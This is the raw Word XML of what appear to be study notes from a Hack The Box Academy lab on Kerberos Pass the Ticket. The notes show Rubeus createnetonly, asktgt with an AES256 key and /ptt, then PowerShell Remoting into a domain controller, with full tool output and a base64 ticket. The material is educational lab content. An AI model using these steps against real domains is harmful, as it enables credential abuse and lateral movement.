          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Windows PowerShell</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Copyright (C) 2015 Microsoft Corporation. All rights reserved.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PS C:\tools&gt; Enter-PSSession -ComputerName DC01</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[DC01]: PS C:\Users\john\Documents&gt; whoami</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>inlanefreight\john</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[DC01]: PS C:\Users\john\Documents&gt; hostname</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>DC01</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[DC01]: PS C:\Users\john\Documents&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="110B26C4" wp14:textId="4EC9155D"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="3F4AE307" wp14:textId="34ADBE27">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Rubeus - PowerShell Remoting with Pass the Ticket</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="26679009" wp14:textId="53B72593">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Rubeus has the option createnetonly, which creates a sacrificial process/logon session (</w:t>
      </w:r>
      <w:hyperlink r:id="R1a45bc2c2bd64847">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>Logon type 9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>). The process is hidden by default, but we can specify the flag /show to display the process, and the result is the equivalent of runas /netonly. This prevents the erasure of existing TGTs for the current logon session.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="26F73F66" wp14:textId="37F53ADE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Create a Sacrificial Process with Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="0211686E" wp14:textId="1FD205BA">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65F84078" wp14:textId="0519245D">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createnetonly /program:"C:\Windows\System32\cmd.exe" /show</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v2.0.3</w:t>
      </w:r>
      <w:r>
        <w:br/>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Create process (/netonly)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[*] Using random username and password.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Showing process : True</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[*] Username        : JMI8CL7C</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[*] Domain          : DTCDV6VL</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[*] Password        : MRWI6XGI</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[+] Process         : 'cmd.exe' successfully created with LOGON_TYPE = 9</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[+] ProcessID       : 1556</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[+] LUID            : 0xe07648</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="665226E5" wp14:textId="63168CCB">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>The above command will open a new cmd window. From that window, we can execute Rubeus to request a new TGT with the option /ptt to import the ticket into our current session and connect to the DC using PowerShell Remoting.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="7E3D69A2" wp14:textId="610C7C01">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Rubeus - Pass the Ticket for Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="6C0F7E5A" wp14:textId="46F3D4DF">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass the Ticket (PtT) from Windows </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="4BC2C08A" wp14:textId="62EBC77D">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A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>C:\tools&gt; Rubeus.exe asktgt /user:john /domain:inlanefreight.htb /aes256:9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc /ptt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______        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      |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v2.0.3</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Action: Ask TGT</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Using aes256_cts_hmac_sha1 hash: 9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[*] Building AS-REQ (w/ preauth) for: 'inlanefreight.htb\john'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[*] Using domain controller: 10.129.203.120:88</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[+] TGT request successful!</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[*] base64(ticket.kirbi):</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doIFqDCCBaSgAwIBBaEDAgEWooIEojCCBJ5hggSaMIIElqADAgEFoRMbEUlOTEFORUZSRUlHSFQuSFRC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oiYwJKADAgECoR0wGxsGa3JidGd0GxFpbmxhbmVmcmVpZ2h0Lmh0YqOCBFAwggRMoAMCARKhAwIBAqKC</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BD4EggQ6JFh+c/cFI8UqumM6GPaVpUhz3ZSyXZTIHiI/b3jOFtjyD/uYTqXAAq2CkakjomzCUyqUfIE5</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+2dvJYclANm44EvqGZlMkFvHK40slyFEK6E6d7O+BWtGye2ytdJr9WWKWDiQLAJ97nrZ9zhNCfeWWQNQ</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dpAEeCZP59dZeIUfQlM3+/oEvyJBqeR6mc3GuicxbJA743TLyQt8ktOHU0oIz0oi2p/VYQfITlXBmpIT</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OZ6+/vfpaqF68Y/5p61V+B8XRKHXX2JuyX5+d9i3VZhzVFOFa+h5+efJyx3kmzFMVbVGbP1DyAG1JnQO</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h1z2T1egbKX/Ola4unJQRZXblwx+xk+MeX0IEKqnQmHzIYU1Ka0px5qnxDjObG+Ji795TFpEo04kHRwv</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zSoFAIWxzjnpe4J9sraXkLQ/btef8p6qAfeYqWLxNbA+eUEiKQpqkfzbxRB5Pddr1TEONiMAgLCMgphs</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gVMLj6wtH+gQc0ohvLgBYUgJnSHV8lpBBc/OPjPtUtAohJoas44DZRCd7S9ruXLzqeUnqIfEZ/DnJh3H</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SYtH8NNSXoSkv0BhotVXUMPX1yesjzwEGRokLjsXSWg/4XQtcFgpUFv7hTYTKKn92dOEWePhDDPjwQmk</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H6MP0BngGaLK5vSA9AcUSi2l+DSaxaR6uK1bozMgM7puoyL8MPEhCe+ajPoX4TPn3cJLHF1fHofVSF4W</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nkKhzEZ0wVzL8PPWlsT+Olq5TvKlhmIywd3ZWYMT98kB2igEUK2G3jM7XsDgwtPgwIlP02bXc2mJF/VA</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qBzVwXD0ZuFIePZbPoEUlKQtE38cIumRyfbrKUK5RgldV+wHPebhYQvFtvSv05mdTlYGTPkuh5FRRJ0e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WIw0HWUm3u/NAIhaaUal+DHBYkdkmmc2RTWk34NwYp7JQIAMxb68fTQtcJPmLQdWrGYEehgAhDT2hX+8</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VMQSJoodyD4AEy2bUISEz6x5gjcFMsoZrUmMRLvUEASB/IBW6pH+4D52rLEAsi5kUI1BHOUEFoLLyTNb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4rZKvWpoibi5sHXe0O0z6BTWhQceJtUlNkr4jtTTKDv1sVPudAsRmZtR2GRr984NxUkO6snZo7zuQiud</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7w2NUtKwmTuKGUnNcNurz78wbfild2eJqtE9vLiNxkw+AyIr+gcxvMipDCP9tYCQx1uqCFqTqEImOxpN</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BqQf/MDhdvked+p46iSewqV/4iaAvEJRV0lBHfrgTFA3HYAhf062LnCWPTTBZCPYSqH68epsn4OsS+RB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gwJFGpR++u1h//+4Zi++gjsX/+vD3Tx4YUAsMiOaOZRiYgBWWxsI02NYyGSBIwRC3yGwzQAoIT43EhAu</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HjYiDIdccqxpB1+8vGwkkV7DEcFM1XFwjuREzYWafF0OUfCT69ZIsOqEwimsHDyfr6WhuKua034Us2/V</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8wYbbKYjVj+jgfEwge6gAwIBAKKB5gSB432B4DCB3aCB2jCB1zCB1KArMCmgAwIBEqEiBCDlV0Bp6+en</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HH9/2tewMMt8rq0f7ipDd/UaU4HUKUFaHaETGxFJTkxBTkVGUkVJR0hULkhUQqIRMA+gAwIBAaEIMAYb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BGpvaG6jBwMFAEDhAAClERgPMjAyMjA3MTgxMjQ0NTBaphEYDzIwMjIwNzE4MjI0NDUwWqcRGA8yMDIy</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MDcyNTEyNDQ1MFqoExsRSU5MQU5FRlJFSUdIVC5IVEKpJjAkoAMCAQKhHTAbGwZrcmJ0Z3QbEWlubGFu</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ZWZyZWlnaHQuaHRi</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[+] Ticket successfully imported!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ServiceName              :  krbtgt/inlanefreight.htb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ServiceRealm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UserName                 :  john</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UserRealm                :  INLANEFREIGHT.HTB</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StartTime                :  7/18/2022 5:44:50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EndTime                  :  7/18/2022 3:44:50 PM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RenewTill                :  7/25/2022 5:44:50 AM</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Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable</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KeyType                  :  aes256_cts_hmac_sha1</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Base64(key)              :  5VdAaevnpxx/f9rXsDDLfK6tH+4qQ3f1GlOB1ClBWh0=</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">  ASREP (key)              :  9279BCBD40DB957A0ED0D3856B2E67F9BB58E6DC7FC07207D0763CE2713F11DC</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c:\tools&gt;powershell</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Windows PowerShell</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Copyright (C) 2015 Microsoft Corporation. All rights reserved.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>PS C:\tools&gt; Enter-PSSession -ComputerName DC01</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[DC01]: PS C:\Users\john\Documents&gt; whoami</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>inlanefreight\john</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[DC01]: PS C:\Users\john\Documents&gt; hostname</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>DC01</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="2DC08235" wp14:textId="29E729C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29b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6C889"/>
    <w:rsid w:val="0906C889"/>
    <w:rsid w:val="1A6F61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C889"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7A00AE31-CEB4-43DB-854F-061AE368B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ttack.mitre.org/techniques/T1550/003/" TargetMode="External" Id="Rf8d80f08a5b143d7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://academy.hackthebox.com/module/74/section/701" TargetMode="External" Id="R382b2db02d6848f5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://academy.hackthebox.com/module/details/74" TargetMode="External" Id="R0cf0c738dc044f3b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:benjamin@gentilkiwi.com" TargetMode="External" Id="R09024bfafd954f89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.gentilkiwi.com/mimikatz" TargetMode="External" Id="Re6c0e06ed4a242b8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:vincent.letoux@gmail.com" TargetMode="External" Id="R4d3121c81e784d9b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pingcastle.com" TargetMode="External" Id="Red3f3c6331724a6f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mysmartlogon.com" TargetMode="External" Id="Rd10b7a0153cd4dc4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:0;5063e]-1-0-40a50000-DC01$@LDAP-DC01.inlanefreight.htb.kirbi" TargetMode="External" Id="R0db919aa4b8f4f13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi" TargetMode="External" 